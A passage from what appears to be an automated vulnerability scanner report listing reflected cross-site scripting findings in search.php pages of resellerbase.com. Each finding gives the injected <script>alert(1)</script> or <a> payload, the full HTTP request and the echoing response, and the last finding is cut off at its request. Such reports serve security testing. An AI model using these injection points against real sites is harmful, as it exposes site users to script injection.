This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...f016d<a>832c4d6e873&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...f016d<a>832c4d6e873&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.415. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe6cf<script>alert(1)</script>3da8c2e6e7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&fe6cf<script>alert(1)</script>3da8c2e6e7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&fe6cf<script>alert(1)</script>3da8c2e6e7d=1 was not found on this server.</p>
...[SNIP]...

2.416. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7bcd9<a>cf9e38edf5e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27bcd9<a>cf9e38edf5e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27bcd9<a>cf9e38edf5e was not found on this server.</p>
...[SNIP]...

2.417. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 584da<script>alert(1)</script>2b34e1b3baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult584da<script>alert(1)</script>2b34e1b3baa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult584da<script>alert(1)</script>2b34e1b3baa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.418. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed3b4<script>alert(1)</script>ebe8aac9b1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesed3b4<script>alert(1)</script>ebe8aac9b1e/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesed3b4<script>alert(1)</script>ebe8aac9b1e/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.419. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b6344<script>alert(1)</script>94b737b70fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosb6344<script>alert(1)</script>94b737b70fb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosb6344<script>alert(1)</script>94b737b70fb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.420. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69ea0<script>alert(1)</script>e0b7b0d0e3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/search.php69ea0<script>alert(1)</script>e0b7b0d0e3d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php69ea0<script>alert(1)</script>e0b7b0d0e3d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.421. http://www.resellerbase.com/adult/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 883c8<a>1040d989e3e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search883c8<a>1040d989e3e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search883c8<a>1040d989e3e&opt=2 was not found on this server.</p>
...[SNIP]...

2.422. http://www.resellerbase.com/adult/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2700f<a>12a09534e32 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...2700f<a>12a09534e32&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...2700f<a>12a09534e32&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.423. http://www.resellerbase.com/adult/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f64f<script>alert(1)</script>be9a70c4364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&8f64f<script>alert(1)</script>be9a70c4364=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&8f64f<script>alert(1)</script>be9a70c4364=1 was not found on this server.</p>
...[SNIP]...

2.424. http://www.resellerbase.com/adult/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6eab6<a>3711ab04637 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26eab6<a>3711ab04637 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26eab6<a>3711ab04637 was not found on this server.</p>
...[SNIP]...

2.425. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7132d<script>alert(1)</script>9c3fb6a5e6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult7132d<script>alert(1)</script>9c3fb6a5e6c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult7132d<script>alert(1)</script>9c3fb6a5e6c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.426. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d53b7<script>alert(1)</script>ab42275ebf4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesd53b7<script>alert(1)</script>ab42275ebf4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesd53b7<script>alert(1)</script>ab42275ebf4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.427. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32a93<script>alert(1)</script>3e7dee135b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/search.php32a93<script>alert(1)</script>3e7dee135b1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php32a93<script>alert(1)</script>3e7dee135b1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.428. http://www.resellerbase.com/adult/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 14da2<a>c70c7aeff12 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search14da2<a>c70c7aeff12&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search14da2<a>c70c7aeff12&opt=2 was not found on this server.</p>
...[SNIP]...

2.429. http://www.resellerbase.com/adult/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9bf46<a>f208d62ac66 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...9bf46<a>f208d62ac66&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...9bf46<a>f208d62ac66&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.430. http://www.resellerbase.com/adult/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c531<script>alert(1)</script>1894765ede4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2&2c531<script>alert(1)</script>1894765ede4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2&2c531<script>alert(1)</script>1894765ede4=1 was not found on this server.</p>
...[SNIP]...

2.431. http://www.resellerbase.com/adult/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 18bf9<a>e0737fe0a94 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=218bf9<a>e0737fe0a94 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search&opt=218bf9<a>e0737fe0a94 was not found on this server.</p>
...[SNIP]...

2.432. http://www.resellerbase.com/bad_link.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c5f1<script>alert(1)</script>24a5d16097b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

